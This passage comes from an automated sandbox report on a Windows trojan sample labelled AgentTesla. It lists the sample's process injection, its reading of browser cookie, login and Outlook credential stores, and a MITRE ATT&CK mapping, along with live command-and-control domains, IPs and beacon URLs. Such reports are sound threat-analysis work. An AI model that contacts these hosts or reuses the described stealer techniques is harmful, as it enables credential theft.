                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeProcess created: C:\Users\user\Desktop\ORDER - 401.exe "C:\Users\user\Desktop\ORDER - 401.exe"Jump to behavior
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ZaZCnGdXtY.exe, 00000007.00000002.4676980802.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000000.2396985465.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000000.2545863833.0000000001621000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Users\user\Desktop\ORDER - 401.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER - 401.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (a number in front of a technique is the count of matching signatures for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 312 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1575104, Sample: ORDER - 401.exe, Startdate: 14/12/2024, Architecture: WINDOWS, Score: 100)

Start node: DNS/IP: www.aziziyeescortg.xyz; www.54248711.xyz; 17 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures. Performs DNS queries to domains with low reputation (www.54248711.xyz).
  -> ORDER - 401.exe started. Dropped file: C:\Users\user\AppData\...\ORDER - 401.exe.log (ASCII). Starts three further ORDER - 401.exe processes.
    -> ORDER - 401.exe: Maps a DLL or memory area into another process. Injects into ZaZCnGdXtY.exe.
      -> ZaZCnGdXtY.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Starts ieUnatt.exe.
        -> ieUnatt.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into ZaZCnGdXtY.exe; starts firefox.exe.
          -> ZaZCnGdXtY.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). DNS/IP: 123hellodrive.shop 84.32.84.32, ports 49998, 50004, 50012, NTT-LT-ASLT Lithuania; www.artkub.net 185.42.14.166, ports 49917, 49929, 49935, MULTIHOST-ASRU Russian Federation; 11 other IPs or domains.

Source | Detection | Scanner | Label
ORDER - 401.exe | 77% | Virustotal |
ORDER - 401.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
ORDER - 401.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://lameo.nrkeiu.tdvgb.cn/123.html | 0% | Avira URL Cloud | safe
http://www.123hellodrive.shop/vc3u/ | 100% | Avira URL Cloud | malware
https://moneyeasilynac.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | 0% | Avira URL Cloud | safe
http://www.54248711.xyz/e48k/ | 0% | Avira URL Cloud | safe
http://www.bagatowcannabis.cloud/zmax/ | 0% | Avira URL Cloud | safe
http://www.7261ltajbc.bond/vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8 | 0% | Avira URL Cloud | safe
http://www.kkpmoneysocial.top/86am/ | 0% | Avira URL Cloud | safe
http://www.supernutra01.online/b156/ | 0% | Avira URL Cloud | safe
http://www.muasamgiare.click/bsye/ | 100% | Avira URL Cloud | malware
https://moneyeasilypao.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | 0% | Avira URL Cloud | safe
http://www.guacamask.online/px.js?ch=2 | 0% | Avira URL Cloud | safe
http://www.guacamask.online/v2ut/ | 0% | Avira URL Cloud | safe
http://www.happyjam.life/4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8 | 0% | Avira URL Cloud | safe
http://www.kkpmoneysocial.top/86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw== | 0% | Avira URL Cloud | safe
https://kb.fastpanel.direct/troubleshoot/ | 0% | Avira URL Cloud | safe
http://www.aziziyeescortg.xyz/2pcx/ | 0% | Avira URL Cloud | safe
http://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 | 100% | Avira URL Cloud | malware
https://moneyeasilysni.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | 0% | Avira URL Cloud | safe
http://www.litespeedtech.com/error-page | 0% | Avira URL Cloud | safe
http://www.dietcoffee.online/725g/ | 0% | Avira URL Cloud | safe
http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 | 100% | Avira URL Cloud | malware
http://www.guacamask.online/px.js?ch=1 | 0% | Avira URL Cloud | safe
http://www.zoomlive.live/k6vm/ | 0% | Avira URL Cloud | safe
http://www.artkub.net/q5xl/ | 0% | Avira URL Cloud | safe
https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | 0% | Avira URL Cloud | safe
http://www.54248711.xyz/e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA== | 0% | Avira URL Cloud | safe
http://www.bagatowcannabis.cloud | 0% | Avira URL Cloud | safe
https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK | 100% | Avira URL Cloud | malware
http://www.dietcoffee.online/725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8 | 0% | Avira URL Cloud | safe
http://www.guacamask.online/sk-logabpstatus.php?a=MnJENVJwV2lhZW0rV2U4VmdEend6Tm5ucmlLSndTR0pwVHBzV3 | 0% | Avira URL Cloud | safe
http://www.artkub.net/q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8 | 0% | Avira URL Cloud | safe
http://www.appsolucao.shop/qt4m/ | 100% | Avira URL Cloud | malware
http://www.supernutra01.online/b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8 | 0% | Avira URL Cloud | safe
http://www.appsolucao.shop/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 | 100% | Avira URL Cloud | malware
http://www.happyjam.life/4t49/ | 0% | Avira URL Cloud | safe
http://www.zoomlive.live/k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8 | 0% | Avira URL Cloud | safe
https://www.kkpmoneysocial.top | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.aziziyeescortg.xyz | 104.21.77.71 | true | true | | unknown
www.guacamask.online | 208.91.197.27 | true | true | | unknown
www.artkub.net | 185.42.14.166 | true | true | | unknown
www.kkpmoneysocial.top | 172.67.129.38 | true | true | | unknown
www.supernutra01.online | 172.67.220.36 | true | false | | high
appsolucao.shop | 84.32.84.32 | true | true | | unknown
www.7261ltajbc.bond | 154.12.28.184 | true | true | | unknown
123hellodrive.shop | 84.32.84.32 | true | true | | unknown
dns.ladipage.com | 13.228.81.39 | true | false | | high
54248711.xyz | 162.0.217.35 | true | true | | unknown
bagatowcannabis.cloud | 81.2.196.19 | true | true | | unknown
www.zoomlive.live | 154.208.202.225 | true | true | | unknown
www.dietcoffee.online | 77.68.64.45 | true | false | | high
www.happyjam.life | 209.74.77.107 | true | true | | unknown
www.54248711.xyz | unknown | unknown | true | | unknown
www.muasamgiare.click | unknown | unknown | false | | unknown
www.123hellodrive.shop | unknown | unknown | false | | unknown
www.bagatowcannabis.cloud | unknown | unknown | false | | unknown
www.appsolucao.shop | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.muasamgiare.click/bsye/ | true | Avira URL Cloud: malware | unknown
http://www.123hellodrive.shop/vc3u/ | true | Avira URL Cloud: malware | unknown
http://www.54248711.xyz/e48k/ | true | Avira URL Cloud: safe | unknown
http://www.7261ltajbc.bond/vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: safe | unknown
http://www.kkpmoneysocial.top/86am/ | true | Avira URL Cloud: safe | unknown
http://www.bagatowcannabis.cloud/zmax/ | true | Avira URL Cloud: safe | unknown
http://www.supernutra01.online/b156/ | true | Avira URL Cloud: safe | unknown
http://www.dietcoffee.online/725g/ | true | Avira URL Cloud: safe | unknown
http://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: malware | unknown
http://www.happyjam.life/4t49/?NVK8=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDB6X5vsGIHc1mVtIO2AR3GSaQwpWdADtOmAN4eNIbS06uucA==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: safe | unknown
http://www.guacamask.online/v2ut/ | true | Avira URL Cloud: safe | unknown
http://www.aziziyeescortg.xyz/2pcx/ | true | Avira URL Cloud: safe | unknown
http://www.kkpmoneysocial.top/86am/?V6T=lB24KzN0lF-8&NVK8=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6buvt3CihlxRoa3yNm7JisfhZdaiIXVwsk9uJu6AhIF/VUrZw== | true | Avira URL Cloud: safe | unknown
http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: malware | unknown
http://www.artkub.net/q5xl/ | true | Avira URL Cloud: safe | unknown
http://www.zoomlive.live/k6vm/ | true | Avira URL Cloud: safe | unknown
http://www.appsolucao.shop/qt4m/ | true | Avira URL Cloud: malware | unknown
http://www.artkub.net/q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: safe | unknown
http://www.54248711.xyz/e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA== | true | Avira URL Cloud: safe | unknown
http://www.dietcoffee.online/725g/?NVK8=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGwDQIl+yrmVlx7FOU7ZgH2yDrtJhtO3pBjm+x7Tk1qeJTKw==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: safe | unknown
http://www.supernutra01.online/b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: safe | unknown
http://www.happyjam.life/4t49/ | true | Avira URL Cloud: safe | unknown
http://www.appsolucao.shop/qt4m/?NVK8=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLZiqSzgxnAs9V7XipQDSCcuTG51JuJsWtbCKrsXwQUSP17A==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: malware | unknown
http://www.zoomlive.live/k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dts.gnpge.com | ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lameo.nrkeiu.tdvgb.cn/123.html | ieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moneyeasilypao.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/kviskotekaDbDataSet.xsdcIgra | ORDER - 401.exe | false | | high
https://moneyeasilynac.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.guacamask.online/px.js?ch=2 | ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.guacamask.online/px.js?ch=1 | ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js?4aeef933dc234878d84d1123ae8eab9f | ieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp; firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://kb.fastpanel.direct/troubleshoot/ | ieUnatt.exe, 00000008.00000002.4677795800.0000000005EEA000.00000004.10000000.00040000.00000000.sdmp; ieUnatt.exe, 00000008.00000002.4679752589.00000000073B0000.00000004.00000800.00020000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000045FA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.litespeedtech.com/error-page | ieUnatt.exe, 00000008.00000002.4677795800.0000000005D58000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004468000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://moneyeasilysni.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA== | ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
